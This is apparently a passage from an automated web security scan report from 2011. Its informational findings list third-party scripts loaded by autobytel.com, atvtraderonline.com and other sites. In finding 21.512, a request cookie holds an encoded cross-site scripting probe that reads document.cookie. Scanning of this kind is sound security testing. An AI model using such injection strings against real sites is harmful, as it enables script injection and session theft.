http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js

Request

GET /gp/site-directory/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.504. http://www.americascupmedia.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.americascupmedia.com
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4abb7f3a6673ddbf

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.505. http://www.armanijeans-theroom.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.armanijeans-theroom.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://code.jquery.com/jquery-1.4.2.min.js
http://connect.facebook.net/en_US/all.js

Request

GET / HTTP/1.1
Host: www.armanijeans-theroom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:08:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding
Content-Length: 5926
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta property="og:title" content="ArmaniJeans-The Room" />
<meta property="og:description" content="Explore Arman
...[SNIP]...
</script>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

21.506. http://www.aspirationtech.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aspirationtech.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.flickr.com/badge_code_v2.gne?count=2&display=random&size=s&layout=v&source=all_tag&tag=aspirationtech&user=28822958%40N00

Request

GET / HTTP/1.1
Host: www.aspirationtech.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.507. http://www.atvtraderonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atvtraderonline.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:23:56 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:23:56 GMT
Connection: close
Content-Type: text/html
Content-Length: 65145

<!DOCTYPE html>
<html>
<head>
   <title>ATVs for Sale - Bombardier, Polaris, Can-Am, Arctic Cat - ATV Trader.com</title>
   <meta http-equiv="Cache-Control" content="no-cache" />

...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.508. http://www.atvtraderonline.com/find/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atvtraderonline.com
Path:	/find/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /find/ HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:24:06 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 159285


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Find New and Used ATVs, Four Wheelers, All Terrain Vehicles at ATVTraderOnline.com</tit
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.509. http://www.atvtraderonline.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atvtraderonline.com
Path:	/research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:24:10 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 23440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>ATV Resources: Finance, Insurance, Shipping, and More - ATVTraderOnline.com</title>
   <m
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="/css/atv-css.php?pageName=resources" />
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.510. http://www.atvtraderonline.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atvtraderonline.com
Path:	/sell/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:24:07 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used ATV fast - ATVTraderOnline.com</title>
   <meta name="description"
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="/css/atv-css.php?pageName=sell" />
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.511. http://www.autobytel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=13148;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=597x90;ord=43455279?
http://ad.doubleclick.net/adj/abtl.home/mtu;abr=!ie;kw=mtu;info=13148;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=369x78;!cat=;ord=43455279?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:23 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 71009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
8;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=369x78;!cat=;ord=43455279?" name="frame1" width="369" height="78" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" border="0">
   <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.home/mtu;abr=!ie;kw=mtu;info=13148;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=369x78;!cat=;ord=43455279?">
   </script>
...[SNIP]...
13148;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=586x90;ord=43455279?" name="frame1" width="586" height="93" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
       <script language="Javascript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=13148;u=|||480F9C2F-ADA0-01E2-EACC2715BA2BAFC8|||13148|||;sz=597x90;ord=43455279?">
       </script>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.512. http://www.autobytel.com/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/a

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

GET /a HTTP/1.1
Host: www.autobytel.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cweb=JONQJVS10.4.128.176CKMMM; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; COUNT=1; TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; HOMEVERSION=2; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; PV_CT=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23309
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 21:06:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 21:06:42 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 21:06:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 21:06:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=2;path=/




  


       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.513. http://www.autobytel.com/a.cfml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/a.cfml

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23425
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:41:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:20 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/




  


       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.514. http://www.autobytel.com/ask-our-mechanics/my-garage.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/ask-our-mechanics/my-garage.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:49:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:49:59 GMT
Content-Length: 22160
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.515. http://www.autobytel.com/auto-insurance-quotes.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/auto-insurance-quotes.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=728x90;ptile=1;!cat=;ord=54106460?
http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=160x600;ptile=2;!cat=;ord=54106460?
http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=1x3;!cat=;ord=54106460?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=yes
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:47:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:01 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33642

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=728x90;ptile=1;!cat=;ord=54106460?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=728x90;ptile=1;!cat=;ord=54106460?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.finins/;kw=;info=13148;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=1x3;!cat=;ord=54106460?"></script>
...[SNIP]...
EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=160x600;ptile=2;!cat=;ord=54106460?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.finins/;abr=!ie;kw=;info=13148;u=|||483A0EA1-B667-4CC7-17253E160FF12410|||13148|||;sz=160x600;ptile=2;!cat=;ord=54106460?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=yes"></SCRIPT>
...[SNIP]...

21.516. http://www.autobytel.com/car-advice.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-advice.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=63939636?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=63939636?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=1x3;!cat=;ord=63939636?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43756
Expires: Mon, 24 Jan 2011 23:47:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:47 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:46 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
0CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=63939636?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=63939636?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=1x3;!cat=;ord=63939636?"></script>
...[SNIP]...
CCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=63939636?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||4840CCCA-008F-5FCD-9106F5804B7D10B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=63939636?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.517. http://www.autobytel.com/car-blog.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-blog.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=728x90;ptile=1;!cat=;ord=30821774?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=160x600;ptile=2;!cat=;ord=30821774?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=1x3;!cat=;ord=30821774?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:48:00 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62043

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=728x90;ptile=1;!cat=;ord=30821774?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=728x90;ptile=1;!cat=;ord=30821774?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=1x3;!cat=;ord=30821774?"></script>
...[SNIP]...
1C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=160x600;ptile=2;!cat=;ord=30821774?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||484311C2-B6EC-7842-F4BD229581F46D85|||13148|||;sz=160x600;ptile=2;!cat=;ord=30821774?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.518. http://www.autobytel.com/car-dealers.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-dealers.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=728x90;ptile=1;!cat=;ord=8791101?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=160x600;ptile=3;!cat=;ord=8791101?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=1x3;!cat=;ord=8791101?
http://ad.doubleclick.net/adj/abtl.research/fms;abr=!ie;kw=fms;u=|||48624F68-A483-63CB-3B51F117F878BEFE|||13148|||;sz=300x250;ptile=2;!cat=;ord=8791101?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:25 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


